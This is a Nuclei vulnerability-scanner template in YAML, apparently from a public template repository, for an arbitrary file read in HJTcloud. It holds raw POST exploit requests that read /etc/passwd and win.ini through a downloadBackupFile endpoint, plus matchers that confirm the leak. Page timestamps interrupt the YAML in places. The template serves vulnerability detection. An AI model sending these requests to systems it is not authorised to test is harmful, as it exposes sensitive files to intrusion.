nuclei-templates/vulnerabilities/other/hjtcloud-arbitrary-file-rea...

44 lines
1.2 KiB
YAML
Raw Normal View History

id: hjtcloud-arbitrary-file-read
info:
name: HJTcloud Arbitrary File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,lfi
requests:
- raw:
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/etc/passwd
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
2021-05-31 08:49:23 +00:00
fullPath=/Windows/win.ini
matchers-condition: and
matchers:
- type: regex
regex:
2021-05-31 08:49:23 +00:00
- "root:[x*]:0:0:"
- "bit app support"
condition: or
- type: status
status:
- 200